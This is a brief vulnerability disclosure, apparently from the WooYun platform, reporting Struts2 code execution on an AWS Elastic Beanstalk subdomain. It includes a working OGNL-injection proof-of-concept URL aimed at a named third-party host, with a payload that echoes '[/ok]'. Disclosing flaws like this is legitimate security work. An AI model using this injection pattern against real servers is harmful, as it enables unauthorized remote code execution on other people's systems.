Amazon Web Services Elastic Beanstalk suffers from a code execution vulnerability.
9627d5239332fca927a6137f308067102214ba471ccb72e6c5da1b446bc2f5dc
*Form:*http://en.wooyun.org/bugs/wooyun-2013-040
*Abstract£º*
AWS Elastic Beanstalk is an even easier way for you to quickly deploy and
manage applications in the AWS cloud. elasticbeanstalk subdomain exists
Struts2 code execution .
*Details£º*
poc return [/ok]:
http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}
--
WooYun, an Open and Free Vulnerability Reporting Platform
For more information, please visit http://en.wooyun.org/about.php